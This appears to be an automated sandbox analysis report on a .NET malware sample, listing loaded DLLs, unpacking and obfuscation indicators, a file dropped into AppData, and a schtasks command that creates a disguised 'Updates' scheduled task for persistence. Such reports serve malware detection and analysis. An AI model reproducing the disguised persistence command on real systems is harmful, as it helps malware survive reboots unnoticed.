                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: tfF3UBTdr8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: tfF3UBTdr8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.0000000001595000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: tfF3UBTdr8.exe, Fcontainer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: WltfeVzR.exe.0.dr, Fcontainer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.5c50000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.4131fd8.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.cs.Net Code: A5gOrm5nqsWvGsyckyl System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06AD1810 push es; ret 9_2_06AD1820
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655E5C0 push es; ret 16_2_0655E5D0
                    Source: tfF3UBTdr8.exeStatic PE information: section name: .text entropy: 7.71081119448831
                    Source: WltfeVzR.exe.0.drStatic PE information: section name: .text entropy: 7.71081119448831
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, uML3WEBFJ6P1y2g7lm.csHigh entropy of concatenated method names: 'aLbYY6B1t', 'RVEFK9TfC', 'hir2gqyN1', 'pMc1j2go9', 'vxhI2F346', 'HycqVDlkE', 'O2I4j8MYprXo9sXyYE', 'sKjnZJueRTlNcRDkQl', 'NwhnbrFOt', 'Gh0A8gHUh'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, dT726MURehfvJBjAK9A.csHigh entropy of concatenated method names: 'Kmxb6jsZTc', 'jCEb5iFYG8', 'MQbbY8aAnD', 'm3RbF55hN0', 'u1RbwA3OT4', 'QdOb25MN2k', 'LWEb1JCnkq', 'jSBbio3Lr6', 'KLhbImqMPJ', 'fJ4bqFn1Ym'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, cxTl6iIFnHaooFrd3d.csHigh entropy of concatenated method names: 'PZGlF2a5No', 'D6el2MZ0Rq', 'ihBliZC0mC', 'JFelIa7ygm', 'krIlNPuTnC', 'qDrlEbFXUg', 'VXxlCswIfj', 'fwalnbhOIR', 'vkBlb3NJRw', 'iNxlAaPX1p'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, FhTH0XyW1QkdVQVn6k.csHigh entropy of concatenated method names: 'hfvCsrvTKI', 'dghCDUyj9T', 'qL7nRauRXZ', 'uw6nUB3P5p', 'Do3CSBHZP0', 'FYWC3nabnc', 'nQICL3h48Z', 'rElCjugKtR', 'W9yCd1biLx', 'CmLCHcbTtJ'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, SNWnXyVZYnm0V6f3LI.csHigh entropy of concatenated method names: 'Rtch6KIJIO', 'JS6h5BVLOg', 'qCrhYkdSJ5', 'BgohFRuaIa', 'FNKhwl89mw', 'pKhh2KgXac', 'X6hh1A4NyC', 'pYLhiPp9lR', 'lV3hIo73py', 'TBYhqf9rTe'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, s6GRCtPhvRtfoXDgnB.csHigh entropy of concatenated method names: 'k3gkHCxWcA', 'tpakOcP1KR', 'J9JkGG6O40', 'ToString', 'pM0kytBVCG', 'l03kWg8em1', 'luoDUap8TheLV7097HV', 'AyBdsDp6HhHq9olIxBG', 'vJwnDmpZIrM9lWF2B88'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, n5AhqRjFmCDnqhxMEp.csHigh entropy of concatenated method names: 'U8GNcL9K8w', 'tQLN3SXb8k', 'zWDNjO0k0q', 'hAbNd5Pq5G', 'm4hN4II7On', 'AYfNQ3w6oc', 'mVDNaZroDB', 'eUONKS3FP7', 'PQCNP0R3Kk', 'XIJNuv9pYX'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, kAktYSJrIKSKWvhdrQ.csHigh entropy of concatenated method names: 'BbuUhb5H43', 'z6AUp7OV1v', 'DFnUoHaooF', 'nd3UrdQk9o', 'pu5UNJdSqE', 'GDZUEBctjM', 'yE9mXHvFoSmmsUqaO4', 'UgWXbuiMoIjjkJliTf', 'p8XUUBnoFJ', 'qIIU8ndGiF'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, otODWTUUeEFX38psgqW.csHigh entropy of concatenated method names: 'ToString', 'j3gA8op65c', 'qQcAJEuYAR', 'fV3AvyDNju', 'uIEAfZGuAv', 'smTATT62Qy', 'fsqAlgc4FK', 'tm5AXx2LCc', 'eNhcg1UZW9dQlPaVPJG', 'rh8QqBUIeV2vBwkwwhF'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, tyfC1tDv8q2Zab3GDq.csHigh entropy of concatenated method names: 'Lb2bULXVAe', 'lRfb8qNdvB', 'IIebJtXrNx', 'BMMbfT94N8', 'esUbTKaRuE', 'PIrbXOroo9', 'yaJbkq6TNt', 'yXVnWR3sGx', 'koHnsnjXkF', 'FRnnZnB9ZN'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, Ik9oFBqladXBAEu5Jd.csHigh entropy of concatenated method names: 'xIaXwt0n5G', 'zsJX1hHasD', 'OJ4lQYZVDi', 'WMLlalKT5R', 'jdPlKJTvNU', 'bg5lPUKmka', 'riXlufXUca', 'pH0lMQCgEe', 'bpolVEkmKw', 'XFUlcVOwlH'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, hXrQrJzVHwaNsaBV7Z.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'klGbt4OgRb', 'PK7bN36QXm', 'sagbET0um2', 'QpNbCvRVH0', 'zhlbnMFxyR', 'mM8bbJ87cS', 'N8dbAQ81aS'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, fMd2iOLNT9EMdexcA6.csHigh entropy of concatenated method names: 'D1itie4wOb', 'HvetIuHKRl', 'cLJtmdq1SO', 'jmZt4mjr4Z', 'tRRtao9yv9', 'wwQtK0BYSh', 'ef4tu3GgRo', 'XRgtM0OugZ', 'nGJtcPqsjp', 'jJJtSCBPYF'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, jMCCHkp7QSbiSsHkW0.csHigh entropy of concatenated method names: 'MyO8vW1FYn', 'sIn8follgB', 'cGg8TbrgEP', 'kAE8l6d2IZ', 'Yih8XNLMtj', 'ods8kKxAaX', 'ACo8hqKDJ4', 'fJi8pbimnR', 'TVj87aq2xf', 'H4k8oBr7HH'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, bVZ2w8sIvM8TEcfHwi.csHigh entropy of concatenated method names: 'imCnfR0l4E', 'yPcnTES8HV', 'XSMnl87ZOb', 'WhMnXNh18v', 't44nkCn3Ov', 'GDWnhIq9wV', 'uj0npMtmBX', 'EyQn7HeJri', 'Jy8noaMk8m', 'lQfnr3Gknf'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, N2jIepUB2LMgHYGkhkh.csHigh entropy of concatenated method names: 'xUDA6wtn4S', 'h18A5fMu1y', 'uwQAYNAO6J', 'MkpAZhUvA4ssMxnuxVJ', 'Xqr4OhUi6IKT1WVXLS4', 'd5IaaxUEeIXtHyulSLG', 'EhPmEJUfRTfhd09jC5K', 'Pmsf0sUGFiZbUjwPkrK'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, C6EIUQU8JeQ0TQMe69e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'F2iAj2CL9h', 'fFmAdpHUxP', 'gUsAH7ggLo', 'oHSAOv1cv7', 'GbYAGfU8u9', 'cZ3Ays3AUB', 'MmRAWRI4ix'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, Lb5H43iY6A7OV1von7.csHigh entropy of concatenated method names: 'lUoTjKlGIK', 'XAuTdFBmV2', 'QIeTHCvMQ5', 'KgfTOUqY9M', 'TrATGyADjZ', 'WiMTy89rK1', 'SpZTWeRTpL', 'CFTTsKu2bV', 'qn3TZ7Wq8O', 'FYETD2QUcY'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, JM3A5rH3b7n3Q91VjN.csHigh entropy of concatenated method names: 'ToString', 'GhgESlh8uL', 'wKPE4xAeuo', 'BjLEQ0pECE', 'Jm1Eaw8Hq5', 'TN6EK0BQcA', 'rqHEPTxMA5', 'm4gEu3aGpJ', 'UAWEMXKRF7', 'UMKEV2x6jk'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, RVRs1vuoHG4pBFiOCo.csHigh entropy of concatenated method names: 'akrhfFREkr', 'tdthlpBoE7', 'YBShkh2F2A', 'XxikD4ruue', 'yb8kz7XwnB', 'rZJhRC2nro', 'XDRhUbwUEP', 'jsLhBhijcW', 'mSLh8y8Cny', 'vp1hJH4hsg'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, BHnv0rOjAUpsEFLMAJ.csHigh entropy of concatenated method names: 'ujsCoqNPL2', 'VR8CrGYNWC', 'ToString', 'GssCfoNlBG', 'iPGCTbZFiD', 'WgnClUZiFA', 'VRhCX1N0SG', 'secCkvQj7l', 'zwvChTJwJC', 'pg8CpsCyaH'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, eAlIYKTDvBfHG7NVqH.csHigh entropy of concatenated method names: 'Dispose', 'hgFUZlLt24', 'wlJB4GlYSP', 'reRHH6GXP5', 'FUVUDZ2w8I', 'eM8UzTEcfH', 'ProcessDialogKey', 'BicBRZBSMj', 'xMKBUAPdgC', 'm1ABB9yfC1'
                    Source: 0.2.tfF3UBTdr8.exe.7630000.4.raw.unpack, OqEmDZmBctjMwaODGs.csHigh entropy of concatenated method names: 'GpUkvI3v1J', 'ywfkTNZBVD', 'VvSkXIA9Cy', 'rBWkhQOry1', 'nRjkpnYuI0', 'vasXGB963w', 'tCbXynZI5Q', 'jUNXWnpxvd', 'h5aXsTKJso', 'd0gXZ9O3BX'
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile created: C:\Users\user\AppData\Roaming\WltfeVzR.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WltfeVzR" /XML "C:\Users\user\AppData\Local\Temp\tmp8652.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
